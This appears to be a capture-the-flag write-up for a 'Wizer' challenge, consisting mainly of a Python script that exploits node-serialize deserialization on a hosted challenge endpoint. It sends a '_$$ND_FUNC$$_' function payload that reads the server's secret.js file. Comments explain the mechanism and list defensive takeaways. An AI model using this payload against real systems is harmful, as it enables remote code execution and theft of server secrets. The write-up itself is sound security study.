Wizer - Challenge 4 - node-serialize RCE

Exploit

import requests

# Endpoint of the hosted challenge instance this write-up targets.
url = "https://movies-rosy-three.vercel.app/api/movies"

# Why the server runs this string: node-serialize tags serialized functions
# with the "_$$ND_FUNC$$_" prefix and unserialize() rebuilds them with eval().
# The trailing "()" makes the function an immediately-invoked expression, so
# it executes during deserialization. Here it returns the contents of the
# challenge's secret.js (the secret key the write-up is after).
# NOTE(review): the server code is not shown on this page; presumably the
# "message" field reaches unserialize() -- confirm against the challenge source.
#
# Defender takeaways: never pass request data to node-serialize's
# unserialize() (JSON.parse is enough for data-only payloads), and treat the
# "_$$ND_FUNC$$_" marker in inbound request bodies as a detection signal.
serialized_function = "_$$ND_FUNC$$_function (){ return require('fs').readFileSync('/var/task/.next/server/pages/api/secret.js'); }()"

# NOTE(review): the role of fieldName/fieldValue is not visible here;
# presumably they are required by the API's request schema -- verify.
request_body = {
    "message": serialized_function,
    "fieldName": "_id",
    "fieldValue": "aa",
}

# Single JSON POST; the body of the reply is printed as-is.
response = requests.post(url, json=request_body)

print(response.text)